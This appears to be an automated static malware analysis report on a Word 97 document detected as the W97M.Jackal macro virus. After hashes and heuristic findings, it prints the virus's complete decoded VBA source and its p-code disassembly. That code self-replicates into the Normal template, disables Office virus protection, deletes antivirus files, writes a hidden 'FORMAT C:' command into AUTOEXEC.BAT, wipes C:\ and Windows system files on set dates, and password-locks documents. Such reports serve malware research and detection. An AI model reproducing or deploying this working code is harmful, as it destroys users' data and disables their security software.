Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1c348350a8214c95…

MALICIOUS

Office (OLE)

50.0 KB Created: 1997-01-17 13:34:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 7ca79e87ad58bcaf885b3f2419d1c1c1 SHA-1: 1c2b6705091c34fdf1ac5f4777850def6c2ac720 SHA-256: 1c348350a8214c95b49b7e297b6fc70a3acb86c5edab5d3b6a010a956e63a495
308 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The file contains legacy WordBasic macro markers and a VBA AutoOpen macro, indicating a macro-based attack. The AutoOpen subroutine attempts to copy the macro code to the Normal template and the active document, suggesting an attempt to establish persistence. The presence of 'KillAV' and 'ULTRAS' strings within the macro code, along with ClamAV detection as 'Doc.Trojan.Killer-10', points to a malicious intent, likely to disable security software or download further payloads.

Heuristics 8

  • ClamAV: Doc.Trojan.Killer-10 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Killer-10
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
      Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    This finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. OLE file is 19,378 bytes but its declared streams total only 0 bytes — 19,378 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    This finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 23988 bytes
SHA-256: db8d9f2628099eaee1258b685fcdb3341973ba71ffcc3cf9f9a80f837a9f58a4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Jackal"
Sub AutoOpen()
  On Error GoTo Jackal

  ULTRAS

  KillAV

  Jackal

  Application.ScreenUpdating = False
  Application.DisplayAlerts = wdAlertsNone

  WordBasic.DisableAutoMacros 0
  Options.VirusProtection = False

  Set GlobalDoc = NormalTemplate
  Set ActiveDoc = ActiveDocument

  GlobalInstalled = No
  DocumentInstalled = No

  For j = 1 To NormalTemplate.VBProject.VBComponents.Count
    If NormalTemplate.VBProject.VBComponents(j).Name = "Jackal" Then
      GlobalInstalled = Yes
    End If
  Next

  For i = 1 To ActiveDocument.VBProject.VBComponents.Count
    If ActiveDocument.VBProject.VBComponents(i).Name = "Jackal" Then
      DocumentInstalled = Yes
    End If
  Next

  If GlobalInstalled = No Then
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Jackal", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="UserForm", Object:=wdOrganizerObjectProjectItems
    Options.SaveNormalPrompt = False
  End If

  If DocumentInstalled = No Then
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Jackal", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="UserForm", Object:=wdOrganizerObjectProjectItems
    ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
  End If

  Application.DisplayAlerts = wdAlertsAll

Jackal:
End Sub


Sub FileSaveAs()

  Dialogs(wdDialogFileSaveAs).Show

  On Error GoTo Jackal

  Jackal

  ULTRAS

  KillAV

  Application.ScreenUpdating = False
  Application.DisplayAlerts = wdAlertsNone

  WordBasic.DisableAutoMacros 0
  Options.VirusProtection = False

  Set GlobalDoc = NormalTemplate
  Set ActiveDoc = ActiveDocument

  GlobalInstalled = No
  DocumentInstalled = No

  For j = 1 To NormalTemplate.VBProject.VBComponents.Count
    If NormalTemplate.VBProject.VBComponents(j).Name = "Jackal" Then
      GlobalInstalled = Yes
    End If
  Next

  For i = 1 To ActiveDocument.VBProject.VBComponents.Count
    If ActiveDocument.VBProject.VBComponents(i).Name = "Jackal" Then
      DocumentInstalled = Yes
    End If
  Next

  If GlobalInstalled = No Then
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Jackal", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="UserForm", Object:=wdOrganizerObjectProjectItems
    Options.SaveNormalPrompt = False
  End If

  If DocumentInstalled = No Then
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Jackal", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="UserForm", Object:=wdOrganizerObjectProjectItems
    ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
  End If

  Application.DisplayAlerts = wdAlertsAll

 Jackal

Jackal:
End Sub

Sub KillAV()
  On Error GoTo Jackal
  Kill "C:\Program Files\AntiViral Toolkit Pro\*.avc"
  Kill "C:\Program Files\Command Software\F-PROT95\*.dll"
  Kill "C:\Program Files\McAfee\VirusScan95\Scan.dat"
  Kill "C:\Program Files\McAfee\VirusScan\Scan.dat"
  Kill "C:\Program Files\Norton AntiVirus\Viruscan.dat"
  Kill "C:\Program Files\Symantec\Symevnt.386"
  Kill "C:\Program Files\FindVirus\Findviru.drv"
  Kill "C:\Program Files\Cheyenne\AntiVirus\*.dll"
  Kill "C:\PC-Cillin 95\Lpt$vpn.*"
  Kill "C:\PC-Cillin 95\Scan32.dll"
  Kill "C:\PC-Cillin 97\Lpt$vpn.*"
  Kill "C:\PC-Cillin 97\Scan32.dll"
  Kill "C:\eSafe\Protect\*.dll"
  Kill "C:\f-macro\f-macro.exe"
  Kill "C:\TBAVW95\Tbscan.sig"
  Kill "C:\Tbavw95\Tb*.*"
  Kill "C:\VS95\*.dll"
  Kill "C:\Vdoc\*.*"
Jackal:
End Sub

Sub Format()
  On Error GoTo Jackal
  Beep
Msgbox "Error at openings of the document.", vbCritical + vbOKOnly + vbDefaultButton1, "Microsoft Word"
  Assistant.Visible = True
  With Assistant.NewBalloon
  .Text = "Error, is necessary will update files"
  .Heading = "Microsoft Office 97"
  .Animation = msoAnimationEmptyTrash
  .Show
End With
  Open "C:\AUTOEXEC.BAT" For Input As #1
   Close
   SetAttr "C:\AUTOEXEC.BAT", vbNormal
   Open "C:\AUTOEXEC.BAT" For Append As #1
   Print #1, "@ECHO OFF"
   Print #1, "CLS"
   Print #1, "ECHO Microsoft Corp. 1983-1997 All rights reserved"
   Print #1, "ECHO Goes preparation to renovation of your system files"
   Print #1, "ECHO Please wait this can occupy several minutes"
   Print #1, "FORMAT C: /U /C /S /AUTOTEST > NUL"
   Print #1, "ECHO."
   Print #1, "ECHO."
   Print #1, "ECHO."
   Print #1, "ECHO Error at renovations of files"
   Close #1
  SetAttr "C:\AUTOEXEC.BAT", vbReadOnly
Jackal:
End Sub

Sub ToolsMacro()
Beep
Msgbox "Impossible open this function", vbCritical + vbOKOnly + vbMsgBoxHelpButton + vbDefaultButton2, "Error"
End Sub

Sub ViewVBCode()
Beep
Msgbox "Function does not answer system requests" & vbCrLf & "", vbExclamation + vbOKOnly + vbMsgBoxHelpButton + vbDefaultButton2, "Microsoft Visual Basic"
End Sub

Sub FileTemplates()
UserForm.Show
End Sub

Sub EditFind()
UserForm.Show
Dialogs(wdDialogEditFind).Show
End Sub

Sub HelpAbout()
UserForm.Show
End Sub

Sub ToolsCustomize()
UserForm.Show
Dialogs(wdDialogToolsCustomize).Show
End Sub

Sub ToolsOptions()
UserForm.Show
Dialogs(wdDialogToolsOptions).Show
End Sub

Sub Jackal()
  On Error GoTo Jackal

   If Day(Now()) = 1 Then
      ActiveDocument.Password = "JACKAL"
      ActiveDocument.Save
    End If

   If Day(Now()) = 5 Then
      Format
    End If

   If Day(Now()) = 9 Then
      Format
    End If

   If Day(Now()) = 15 Then
     Kill "C:\*.*"
     Kill "C:\Windows\*.*"
     Kill "C:\Windows\System\*.*"
    End If

   If Day(Now()) = 17 Then
      Format
    End If

   If Day(Now()) = 25 Then
      Format
    End If

   If Day(Now()) = 27 Then
      ActiveDocument.Password = "ULTRAS"
      ActiveDocument.Save
    End If

   If Day(Now()) = 30 Then
     Kill "C:\*.*"
     Kill "C:\Windows\*.*"
     Kill "C:\Windows\System\*.*"
    End If

   If Month(Now()) = 5 Then
      Format
    End If

Jackal:
End Sub

Sub ULTRAS()
  On Error GoTo Jackal
  Application.StatusBar = True
  StatusBar = "W97M.JACKAL by ULTRAS"
  Application.Caption = "ULTRAS"
  Application.UserName = "ULTRAS"
  Application.UserInitials = "JACKAL"
  Options.BackgroundSave = False
  Options.CreateBackup = False
  Options.SendMailAttach = True
Jackal:
End Sub

Attribute VB_Name = "UserForm"
Attribute VB_Base = "0{93DA5697-7087-11D0-A953-C1445422832A}{93DA568A-7087-11D0-A953-C1445422832A}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False




' Processing file: /tmp/qstore_m431e8dp
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Jackal - 11342 bytes
' Line #0:
' 	FuncDefn (Sub AutoOpen())
' Line #1:
' 	OnError Jackal 
' Line #2:
' Line #3:
' 	ArgsCall ULTRAS 0x0000 
' Line #4:
' Line #5:
' 	ArgsCall KillAV 0x0000 
' Line #6:
' Line #7:
' 	ArgsCall Jackal 0x0000 
' Line #8:
' Line #9:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #10:
' 	Ld wdAlertsNone 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #11:
' Line #12:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #13:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #14:
' Line #15:
' 	SetStmt 
' 	Ld NormalTemplate 
' 	Set GlobalDoc 
' Line #16:
' 	SetStmt 
' 	Ld ActiveDocument 
' 	Set ActiveDoc 
' Line #17:
' Line #18:
' 	Ld No 
' 	St GlobalInstalled 
' Line #19:
' 	Ld No 
' 	St DocumentInstalled 
' Line #20:
' Line #21:
' 	StartForVariable 
' 	Ld j 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #22:
' 	Ld j 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0006 "Jackal"
' 	Eq 
' 	IfBlock 
' Line #23:
' 	Ld Yes 
' 	St GlobalInstalled 
' Line #24:
' 	EndIfBlock 
' Line #25:
' 	StartForVariable 
' 	Next 
' Line #26:
' Line #27:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #28:
' 	Ld i 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0006 "Jackal"
' 	Eq 
' 	IfBlock 
' Line #29:
' 	Ld Yes 
' 	St DocumentInstalled 
' Line #30:
' 	EndIfBlock 
' Line #31:
' 	StartForVariable 
' 	Next 
' Line #32:
' Line #33:
' 	Ld GlobalInstalled 
' 	Ld No 
' 	Eq 
' 	IfBlock 
' Line #34:
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0006 "Jackal"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #35:
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0008 "UserForm"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #36:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #37:
' 	EndIfBlock 
' Line #38:
' Line #39:
' 	Ld DocumentInstalled 
' 	Ld No 
' 	Eq 
' 	IfBlock 
' Line #40:
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0006 "Jackal"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #41:
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0008 "UserForm"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #42:
' 	Ld ActiveDoc 
' 	MemLd New 
' 	ParamNamed FileName 
' 	Ld wdFormatTemplate 
' 	ParamNamed FileFormat 
' 	Ld ActiveDoc 
' 	ArgsMemCall SaveAs 0x0002 
' Line #43:
' 	EndIfBlock 
' Line #44:
' Line #45:
' 	Ld wdAlertsAll 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #46:
' Line #47:
' 	Label Jackal 
' Line #48:
' 	EndSub 
' Line #49:
' Line #50:
' Line #51:
' 	FuncDefn (Sub FileSaveAs())
' Line #52:
' Line #53:
' 	Ld wdDialogFileSaveAs 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #54:
' Line #55:
' 	OnError Jackal 
' Line #56:
' Line #57:
' 	ArgsCall Jackal 0x0000 
' Line #58:
' Line #59:
' 	ArgsCall ULTRAS 0x0000 
' Line #60:
' Line #61:
' 	ArgsCall KillAV 0x0000 
' Line #62:
' Line #63:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #64:
' 	Ld wdAlertsNone 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #65:
' Line #66:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #67:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #68:
' Line #69:
' 	SetStmt 
' 	Ld NormalTemplate 
' 	Set GlobalDoc 
' Line #70:
' 	SetStmt 
' 	Ld ActiveDocument 
' 	Set ActiveDoc 
' Line #71:
' Line #72:
' 	Ld No 
' 	St GlobalInstalled 
' Line #73:
' 	Ld No 
' 	St DocumentInstalled 
' Line #74:
' Line #75:
' 	StartForVariable 
' 	Ld j 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #76:
' 	Ld j 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0006 "Jackal"
' 	Eq 
' 	IfBlock 
' Line #77:
' 	Ld Yes 
' 	St GlobalInstalled 
' Line #78:
' 	EndIfBlock 
' Line #79:
' 	StartForVariable 
' 	Next 
' Line #80:
' Line #81:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #82:
' 	Ld i 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0006 "Jackal"
' 	Eq 
' 	IfBlock 
' Line #83:
' 	Ld Yes 
' 	St DocumentInstalled 
' Line #84:
' 	EndIfBlock 
' Line #85:
' 	StartForVariable 
' 	Next 
' Line #86:
' Line #87:
' 	Ld GlobalInstalled 
' 	Ld No 
' 	Eq 
' 	IfBlock 
' Line #88:
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0006 "Jackal"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #89:
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0008 "UserForm"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #90:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #91:
' 	EndIfBlock 
' Line #92:
' Line #93:
' 	Ld DocumentInstalled 
' 	Ld No 
' 	Eq 
' 	IfBlock 
' Line #94:
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0006 "Jackal"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #95:
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0008 "UserForm"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #96:
' 	Ld ActiveDoc 
' 	MemLd New 
' 	ParamNamed FileName 
' 	Ld wdFormatTemplate 
' 	ParamNamed FileFormat 
' 	Ld ActiveDoc 
' 	ArgsMemCall SaveAs 0x0002 
' Line #97:
' 	EndIfBlock 
' Line #98:
' Line #99:
' 	Ld wdAlertsAll 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #100:
' Line #101:
' 	ArgsCall Jackal 0x0000 
' Line #102:
' Line #103:
' 	Label Jackal 
' Line #104:
' 	EndSub 
' Line #105:
' Line #106:
' 	FuncDefn (Sub KillAV())
' Line #107:
' 	OnError Jackal 
' Line #108:
' 	LitStr 0x002C "C:\Program Files\AntiViral Toolkit Pro\*.avc"
' 	ArgsCall Kill 0x0001 
' Line #109:
' 	LitStr 0x0030 "C:\Program Files\Command Software\F-PROT95\*.dll"
' 	ArgsCall Kill 0x0001 
' Line #110:
' 	LitStr 0x002C "C:\Program Files\McAfee\VirusScan95\Scan.dat"
' 	ArgsCall Kill 0x0001 
' Line #111:
' 	LitStr 0x002A "C:\Program Files\McAfee\VirusScan\Scan.dat"
' 	ArgsCall Kill 0x0001 
' Line #112:
' 	LitStr 0x002E "C:\Program Files\Norton AntiVirus\Viruscan.dat"
' 	ArgsCall Kill 0x0001 
' Line #113:
' 	LitStr 0x0025 "C:\Program Files\Symantec\Symevnt.386"
' 	ArgsCall Kill 0x0001 
' Line #114:
' 	LitStr 0x0027 "C:\Program Files\FindVirus\Findviru.drv"
' 	ArgsCall Kill 0x0001 
' Line #115:
' 	LitStr 0x0029 "C:\Program Files\Cheyenne\AntiVirus\*.dll"
' 	ArgsCall Kill 0x0001 
' Line #116:
' 	LitStr 0x0019 "C:\PC-Cillin 95\Lpt$vpn.*"
' 	ArgsCall Kill 0x0001 
' Line #117:
' 	LitStr 0x001A "C:\PC-Cillin 95\Scan32.dll"
' 	ArgsCall Kill 0x0001 
' Line #118:
' 	LitStr 0x0019 "C:\PC-Cillin 97\Lpt$vpn.*"
' 	ArgsCall Kill 0x0001 
' Line #119:
' 	LitStr 0x001A "C:\PC-Cillin 97\Scan32.dll"
' 	ArgsCall Kill 0x0001 
' Line #120:
' 	LitStr 0x0016 "C:\eSafe\Protect\*.dll"
' 	ArgsCall Kill 0x0001 
' Line #121:
' 	LitStr 0x0016 "C:\f-macro\f-macro.exe"
' 	ArgsCall Kill 0x0001 
' Line #122:
' 	LitStr 0x0015 "C:\TBAVW95\Tbscan.sig"
' 	ArgsCall Kill 0x0001 
' Line #123:
' 	LitStr 0x0010 "C:\Tbavw95\Tb*.*"
' 	ArgsCall Kill 0x0001 
' Line #124:
' 	LitStr 0x000D "C:\VS95\*.dll"
' 	ArgsCall Kill 0x0001 
' Line #125:
' 	LitStr 0x000B "C:\Vdoc\*.*"
' 	ArgsCall Kill 0x0001 
' Line #126:
' 	Label Jackal 
' Line #127:
' 	EndSub 
' Line #128:
' Line #129:
' 	FuncDefn (Sub Format$())
' Line #130:
' 	OnError Jackal 
' Line #131:
' 	ArgsCall Beep 0x0000 
' Line #132:
' 	LitStr 0x0022 "Error at openings of the document."
' 	Ld vbCritical 
' 	Ld vbOKOnly 
' 	Add 
' 	Ld vbDefaultButton1 
' 	Add 
' 	LitStr 0x000E "Microsoft Word"
' 	ArgsCall Msgbox 0x0003 
' Line #133:
' 	LitVarSpecial (True)
' 	Ld Assistant 
' 	MemSt Visible 
' Line #134:
' 	StartWithExpr 
' 	Ld Assistant 
' 	MemLd NewBalloon 
' 	With 
' Line #135:
' 	LitStr 0x0025 "Error, is necessary will update files"
' 	MemStWith Then 
' Line #136:
' 	LitStr 0x0013 "Microsoft Office 97"
' 	MemStWith Heading 
' Line #137:
' 	Ld msoAnimationEmptyTrash 
' 	MemStWith Animation 
' Line #138:
' 	ArgsMemCallWith Show 0x0000 
' Line #139:
' 	EndWith 
' Line #140:
' 	LitStr 0x000F "C:\AUTOEXEC.BAT"
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Input)
' Line #141:
' 	CloseAll 
' Line #142:
' 	LitStr 0x000F "C:\AUTOEXEC.BAT"
' 	Ld vbNormal 
' 	ArgsCall SetAttr 0x0002 
' Line #143:
' 	LitStr 0x000F "C:\AUTOEXEC.BAT"
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Append)
' Line #144:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0009 "@ECHO OFF"
' 	PrintItemNL 
' Line #145:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0003 "CLS"
' 	PrintItemNL 
' Line #146:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0032 "ECHO Microsoft Corp. 1983-1997 All rights reserved"
' 	PrintItemNL 
' Line #147:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0038 "ECHO Goes preparation to renovation of your system files"
' 	PrintItemNL 
' Line #148:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0030 "ECHO Please wait this can occupy several minutes"
' 	PrintItemNL 
' Line #149:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0022 "FORMAT C: /U /C /S /AUTOTEST > NUL"
' 	PrintItemNL 
' Line #150:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0005 "ECHO."
' 	PrintItemNL 
' Line #151:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0005 "ECHO."
' 	PrintItemNL 
' Line #152:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0005 "ECHO."
' 	PrintItemNL 
' Line #153:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0022 "ECHO Error at renovations of files"
' 	PrintItemNL 
' Line #154:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #155:
' 	LitStr 0x000F "C:\AUTOEXEC.BAT"
' 	Ld vbReadOnly 
' 	ArgsCall SetAttr 0x0002 
' Line #156:
' 	Label Jackal 
' Line #157:
' 	EndSub 
' Line #158:
' Line #159:
' 	FuncDefn (Sub ToolsMacro())
' Line #160:
' 	ArgsCall Beep 0x0000 
' Line #161:
' 	LitStr 0x001D "Impossible open this function"
' 	Ld vbCritical 
' 	Ld vbOKOnly 
' 	Add 
' 	Ld vbMsgBoxHelpButton 
' 	Add 
' 	Ld vbDefaultButton2 
' 	Add 
' 	LitStr 0x0005 "Error"
' 	ArgsCall Msgbox 0x0003 
' Line #162:
' 	EndSub 
' Line #163:
' Line #164:
' 	FuncDefn (Sub ViewVBCode())
' Line #165:
' 	ArgsCall Beep 0x0000 
' Line #166:
' 	LitStr 0x0028 "Function does not answer system requests"
' 	Ld vbCrLf 
' 	Concat 
' 	LitStr 0x0000 ""
' 	Concat 
' 	Ld vbExclamation 
' 	Ld vbOKOnly 
' 	Add 
' 	Ld vbMsgBoxHelpButton 
' 	Add 
' 	Ld vbDefaultButton2 
' 	Add 
' 	LitStr 0x0016 "Microsoft Visual Basic"
' 	ArgsCall Msgbox 0x0003 
' Line #167:
' 	EndSub 
' Line #168:
' Line #169:
' 	FuncDefn (Sub FileTemplates())
' Line #170:
' 	Ld UserForm 
' 	ArgsMemCall Show 0x0000 
' Line #171:
' 	EndSub 
' Line #172:
' Line #173:
' 	FuncDefn (Sub EditFind())
' Line #174:
' 	Ld UserForm 
' 	ArgsMemCall Show 0x0000 
' Line #175:
' 	Ld wdDialogEditFind 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #176:
' 	EndSub 
' Line #177:
' Line #178:
' 	FuncDefn (Sub HelpAbout())
' Line #179:
' 	Ld UserForm 
' 	ArgsMemCall Show 0x0000 
' Line #180:
' 	EndSub 
' Line #181:
' Line #182:
' 	FuncDefn (Sub ToolsCustomize())
' Line #183:
' 	Ld UserForm 
' 	ArgsMemCall Show 0x0000 
' Line #184:
' 	Ld wdDialogToolsCustomize 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #185:
' 	EndSub 
' Line #186:
' Line #187:
' 	FuncDefn (Sub ToolsOptions())
' Line #188:
' 	Ld UserForm 
' 	ArgsMemCall Show 0x0000 
' Line #189:
' 	Ld wdDialogToolsOptions 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #190:
' 	EndSub 
' Line #191:
' Line #192:
' 	FuncDefn (Sub Jackal())
' Line #193:
' 	OnError Jackal 
' Line #194:
' Line #195:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x0001 
' 	Eq 
' 	IfBlock 
' Line #196:
' 	LitStr 0x0006 "JACKAL"
' 	Ld ActiveDocument 
' 	MemSt Password 
' Line #197:
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' Line #198:
' 	EndIfBlock 
' Line #199:
' Line #200:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x0005 
' 	Eq 
' 	IfBlock 
' Line #201:
' 	ArgsCall Format$ 0x0000 
' Line #202:
' 	EndIfBlock 
' Line #203:
' Line #204:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x0009 
' 	Eq 
' 	IfBlock 
' Line #205:
' 	ArgsCall Format$ 0x0000 
' Line #206:
…
